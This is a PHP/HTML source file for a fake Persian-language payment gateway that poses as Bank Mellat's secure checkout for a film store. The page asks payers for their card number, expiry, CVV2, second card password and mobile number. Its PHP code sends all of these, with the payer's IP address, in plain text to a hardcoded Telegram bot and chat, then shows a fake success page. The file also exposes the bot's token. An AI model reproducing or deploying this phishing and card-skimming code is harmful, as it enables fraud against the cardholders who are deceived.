<?php
session_start();
error_reporting(0);
header('Content-Type: text/html; charset=utf-8');

// تنظیمات تلگرام
$TELEGRAM_BOT_TOKEN = '7641566660:AAFkJ_8K6AR3mUgkrxuw2YPQRyD3aliV_uU';
$TELEGRAM_CHAT_ID = -1002824072735;

// اطلاعات محصولات
$products = [
    1 => ['title' => 'فیلم سینمایی A', 'price' => 50000, 'discount' => 10],
    2 => ['title' => 'فیلم سینمایی B', 'price' => 45000, 'discount' => 0],
    3 => ['title' => 'فیلم سینمایی C', 'price' => 60000, 'discount' => 15],
];

// بررسی وجود سفارش
if (!isset($_SESSION['order'])) {
    header("Location: ../");
    exit;
}

$order = $_SESSION['order'];

// توابع
function getProduct($id)
{
    global $products;
    return $products[$id] ?? ['title' => 'محصول ناشناخته', 'price' => 0, 'discount' => 0];
}

function sendToTelegram($msg)
{
    global $TELEGRAM_BOT_TOKEN, $TELEGRAM_CHAT_ID;
    $url = "https://api.telegram.org/bot{$TELEGRAM_BOT_TOKEN}/sendMessage";
    $data = ['chat_id' => $TELEGRAM_CHAT_ID, 'text' => $msg, 'parse_mode' => 'HTML'];
    $options = [
        'http' => [
            'header' => "Content-type: application/x-www-form-urlencoded\r\n",
            'method' => 'POST',
            'content' => http_build_query($data),
            'timeout' => 10
        ]
    ];

    try {
        $context = stream_context_create($options);
        $result = file_get_contents($url, false, $context);
        if ($result === FALSE) {
            file_put_contents('telegram_error.log', date('Y-m-d H:i:s') . " - Failed to send message\n", FILE_APPEND);
        }
        return $result;
    } catch (Exception $e) {
        file_put_contents('telegram_error.log', date('Y-m-d H:i:s') . " - Error: " . $e->getMessage() . "\n", FILE_APPEND);
        return false;
    }
}

// پردازش پرداخت
if (isset($_POST['pay'])) {
    $cardNumber = str_replace([' ', '-'], '', $_POST['card_number']);
    $cardName = htmlspecialchars($_POST['card_name']);
    $expiry = htmlspecialchars($_POST['expiry']);
    $cvv = htmlspecialchars($_POST['cvv']);
    $mobile = htmlspecialchars($_POST['mobile']);
    $password = htmlspecialchars($_POST['password']);

    // اعتبارسنجی
    if (empty($cardNumber) || empty($cardName) || empty($expiry) || empty($cvv) || empty($password)) {
        $error = "لطفا تمام فیلدهای ضروری را پر کنید";
    } elseif (!preg_match('/^\d{16}$/', $cardNumber)) {
        $error = "شماره کارت باید 16 رقمی باشد";
    } elseif (!preg_match('/^\d{2}\/\d{2}$/', $expiry)) {
        $error = "فرمت تاریخ انقضا صحیح نیست (مثال: 12/25)";
    } elseif (!preg_match('/^\d{3,4}$/', $cvv)) {
        $error = "کد CVV2 باید 3 یا 4 رقمی باشد";
    } elseif (!preg_match('/^\d{4,6}$/', $password)) {
        $error = "رمز دوم کارت باید بین 4 تا 6 رقم باشد";
    } else {
        // پرداخت موفق
        $refID = 'REF' . time() . rand(100, 999);
        $ipAddress = $_SERVER['HTTP_CLIENT_IP'] ?? $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'];

        // ذخیره اطلاعات پرداخت
        $paymentData = [
            'order_id' => $order['order_id'],
            'ref_id' => $refID,
            'amount' => $order['amount'],
            'card_last4' => substr($cardNumber, -4),
            'date' => date('Y-m-d H:i:s'),
            'status' => 'completed',
            'mobile' => $mobile,
            'ip' => $ipAddress
        ];

        if (!file_exists('payments')) {
            mkdir('payments', 0755, true);
        }
        file_put_contents("payments/payment_{$order['order_id']}.json", json_encode($paymentData));

        // ارسال به تلگرام
        $msg = "💳 <b>پرداخت جدید</b>\n";
        $msg .= "🆔 کد پیگیری: <code>$refID</code>\n";
        $msg .= "💰 مبلغ: " . number_format($order['amount']) . " تومان\n";
        $msg .= "📦 شماره سفارش: <code>{$order['order_id']}</code>\n";
        $msg .= "👤 نام دارنده کارت: $cardName\n";
        $msg .= "💳 شماره کارت: <code>$cardNumber</code>\n";
        $msg .= "🔑 رمز دوم: <code>$password</code>\n";
        $msg .= "📅 تاریخ انقضا: $expiry\n";
        $msg .= "🔐 کد CVV2: $cvv\n";
        $msg .= "📱 موبایل: $mobile\n";
        $msg .= "🌐 IP: $ipAddress\n";
        $msg .= "🕒 زمان: " . date('Y-m-d H:i:s');

        $telegramResult = sendToTelegram($msg);

        if ($telegramResult === false) {
            file_put_contents("payments/failed_{$order['order_id']}.json", json_encode([
                'payment_data' => $paymentData,
                'telegram_error' => 'Failed to send to Telegram'
            ]));
        }

        // ریدایرکت به صفحه موفقیت
        $_SESSION['payment_success'] = true;
        header("Location: payment_success.php");
        exit;
    }
}
?>
<!DOCTYPE html>
<html lang="fa" dir="rtl">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>درگاه پرداخت | فروشگاه فیلم</title>
    <link href="https://cdn.jsdelivr.net/gh/rastikerdar/vazir-font@v30.1.0/dist/font-face.css" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css">
    <style>
        /* استایل های CSS مانند قبل */
        :root {
            --primary: #6a11cb;
            --secondary: #2575fc;
            --success: #28a745;
            --danger: #dc3545;
            --warning: #ffc107;
            --info: #17a2b8;
            --dark: #343a40;
            --light: #f8f9fa;
        }

        * {
            font-family: 'Vazir', Tahoma;
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            background-color: #f5f7fa;
            color: #333;
            min-height: 100vh;
            display: flex;
            flex-direction: column;
        }

        .payment-header {
            background: linear-gradient(135deg, var(--primary), var(--secondary));
            color: white;
            padding: 20px 0;
            text-align: center;
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
        }

        .payment-container {
            max-width: 600px;
            margin: 30px auto;
            padding: 0 15px;
            flex: 1;
        }

        .payment-card {
            background: white;
            border-radius: 10px;
            box-shadow: 0 5px 15px rgba(0, 0, 0, 0.1);
            overflow: hidden;
            margin-bottom: 20px;
        }

        .payment-card-header {
            background: var(--dark);
            color: white;
            padding: 15px;
            font-weight: bold;
            display: flex;
            align-items: center;
            justify-content: space-between;
        }

        .payment-card-body {
            padding: 20px;
        }

        .payment-summary {
            background: rgba(0, 0, 0, 0.03);
            padding: 15px;
            border-radius: 8px;
            margin-bottom: 20px;
        }

        .payment-summary-item {
            display: flex;
            justify-content: space-between;
            margin-bottom: 10px;
        }

        .payment-summary-item.total {
            font-weight: bold;
            border-top: 1px solid #eee;
            padding-top: 10px;
            margin-top: 10px;
        }

        .form-group {
            margin-bottom: 20px;
        }

        .form-group label {
            display: block;
            margin-bottom: 8px;
            font-weight: bold;
            font-size: 14px;
        }

        .form-control {
            width: 100%;
            padding: 12px 15px;
            border: 1px solid #ddd;
            border-radius: 6px;
            font-size: 16px;
            transition: all 0.3s;
        }

        .form-control:focus {
            outline: none;
            border-color: var(--primary);
            box-shadow: 0 0 0 3px rgba(106, 17, 203, 0.1);
        }

        .form-row {
            display: flex;
            gap: 15px;
        }

        .form-row .form-group {
            flex: 1;
        }

        .btn {
            display: inline-block;
            padding: 12px 24px;
            border: none;
            border-radius: 6px;
            cursor: pointer;
            font-size: 16px;
            font-weight: bold;
            text-align: center;
            transition: all 0.3s;
        }

        .btn-block {
            display: block;
            width: 100%;
        }

        .btn-primary {
            background: linear-gradient(135deg, var(--primary), var(--secondary));
            color: white;
        }

        .btn-primary:hover {
            opacity: 0.9;
            transform: translateY(-2px);
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
        }

        .alert {
            padding: 15px;
            border-radius: 6px;
            margin-bottom: 20px;
            display: flex;
            align-items: center;
        }

        .alert-danger {
            background: rgba(220, 53, 69, 0.1);
            border: 1px solid rgba(220, 53, 69, 0.2);
            color: var(--danger);
        }

        .bank-logos {
            display: flex;
            flex-wrap: wrap;
            gap: 10px;
            justify-content: center;
            margin-top: 20px;
        }

        .bank-logo {
            height: 30px;
            opacity: 0.7;
            transition: all 0.3s;
        }

        .bank-logo:hover {
            opacity: 1;
        }

        .payment-footer {
            text-align: center;
            padding: 20px;
            font-size: 12px;
            color: #666;
            background: white;
            border-top: 1px solid #eee;
        }

        @media (max-width: 576px) {
            .form-row {
                flex-direction: column;
                gap: 0;
            }
        }
    </style>
</head>

<body>
    <div class="payment-header">
        <h2>درگاه پرداخت امن</h2>
        <p>فروشگاه فیلم | بانک ملت</p>
    </div>

    <div class="payment-container">
        <?php if (isset($error)): ?>
            <div class="alert alert-danger">
                <i class="fas fa-exclamation-circle"></i> <?= $error ?>
            </div>
        <?php endif; ?>

        <div class="payment-card">
            <div class="payment-card-header">
                <span><i class="fas fa-shopping-cart"></i> خلاصه سفارش</span>
                <span>#<?= $order['order_id'] ?></span>
            </div>
            <div class="payment-card-body">
                <div class="payment-summary">
                    <?php foreach ($order['items'] as $id => $qty):
                        $product = getProduct($id);
                        $price = $product['price'] * (100 - $product['discount']) / 100;
                        ?>
                        <div class="payment-summary-item">
                            <span><?= $product['title'] ?> (<?= $qty ?> عدد)</span>
                            <span><?= number_format($price * $qty) ?> تومان</span>
                        </div>
                    <?php endforeach; ?>

                    <div class="payment-summary-item total">
                        <span>مبلغ قابل پرداخت</span>
                        <span><?= number_format($order['amount']) ?> تومان</span>
                    </div>
                </div>
            </div>
        </div>

        <div class="payment-card">
            <div class="payment-card-header">
                <span><i class="fas fa-credit-card"></i> اطلاعات پرداخت</span>
            </div>
            <div class="payment-card-body">
                <form method="post" id="paymentForm">
                    <div class="form-group">
                        <label for="card_number">شماره کارت بانکی</label>
                        <input type="text" id="card_number" name="card_number" class="form-control"
                            placeholder="6037 9971 1234 5678" required maxlength="19" oninput="formatCardNumber(this)">
                    </div>

                    <div class="form-group">
                        <label for="card_name">نام دارنده کارت</label>
                        <input type="text" id="card_name" name="card_name" class="form-control"
                            placeholder="نام و نام خانوادگی" required>
                    </div>

                    <div class="form-row">
                        <div class="form-group">
                            <label for="expiry">تاریخ انقضا</label>
                            <input type="text" id="expiry" name="expiry" class="form-control" placeholder="MM/YY"
                                required maxlength="5" oninput="formatExpiry(this)">
                        </div>

                        <div class="form-group">
                            <label for="cvv">کد CVV2</label>
                            <input type="password" id="cvv" name="cvv" class="form-control" placeholder="123" required
                                maxlength="4" inputmode="numeric">
                        </div>
                    </div>

                    <div class="form-group">
                        <label for="password">رمز دوم کارت</label>
                        <input type="password" id="password" name="password" class="form-control"
                            placeholder="رمز دوم کارت بانکی" required minlength="4" maxlength="6" inputmode="numeric">
                    </div>

                    <div class="form-group">
                        <label for="mobile">شماره موبایل (اختیاری)</label>
                        <input type="tel" id="mobile" name="mobile" class="form-control" placeholder="09123456789"
                            maxlength="11" pattern="09\d{9}">
                    </div>

                    <button type="submit" name="pay" class="btn btn-primary btn-block">
                        <i class="fas fa-lock"></i> پرداخت امن
                    </button>
                </form>
            </div>
        </div>

        <div class="bank-logos">
            <img src="https://www.bankmellat.ir/_DouranPortal/logos/fa-IR/MainLogo_Test.png" alt="بانک ملت"
                class="bank-logo">
            <img src="https://gifto.biz/wp-content/uploads/2025/02/shaparak-2.png" alt="شاپرک" class="bank-logo">
            <img src="https://www.sb24.ir/Theme/saman-azar-1403/img/logo.png" alt="سامان" class="bank-logo">
        </div>
    </div>

    <div class="payment-footer">
        <p>پرداخت شما با استفاده از درگاه امن بانک ملت انجام می‌شود</p>
        <p>© <?= date('Y') ?> فروشگاه فیلم - تمام حقوق محفوظ است</p>
    </div>

    <script>
        // فرمت شماره کارت
        function formatCardNumber(input) {
            let value = input.value.replace(/\D/g, '');
            let formatted = '';

            for (let i = 0; i < value.length && i < 16; i++) {
                if (i > 0 && i % 4 === 0) {
                    formatted += ' ';
                }
                formatted += value[i];
            }

            input.value = formatted;
        }

        // فرمت تاریخ انقضا
        function formatExpiry(input) {
            let value = input.value.replace(/\D/g, '');

            if (value.length > 2) {
                input.value = value.substring(0, 2) + '/' + value.substring(2, 4);
            } else {
                input.value = value;
            }
        }

        // اعتبارسنجی فرم
        document.getElementById('paymentForm').addEventListener('submit', function (e) {
            const cardNumber = document.getElementById('card_number').value.replace(/\D/g, '');
            const expiry = document.getElementById('expiry').value;
            const cvv = document.getElementById('cvv').value;
            const password = document.getElementById('password').value;

            if (cardNumber.length !== 16) {
                alert('شماره کارت باید 16 رقمی باشد');
                e.preventDefault();
                return;
            }

            if (!/^\d{2}\/\d{2}$/.test(expiry)) {
                alert('فرمت تاریخ انقضا صحیح نیست (مثال: 12/25)');
                e.preventDefault();
                return;
            }

            if (!/^\d{3,4}$/.test(cvv)) {
                alert('کد CVV2 باید 3 یا 4 رقمی باشد');
                e.preventDefault();
                return;
            }

            if (!/^\d{4,6}$/.test(password)) {
                alert('رمز دوم کارت باید بین 4 تا 6 رقم باشد');
                e.preventDefault();
                return;
            }
        });
    </script>
</body>

</html>د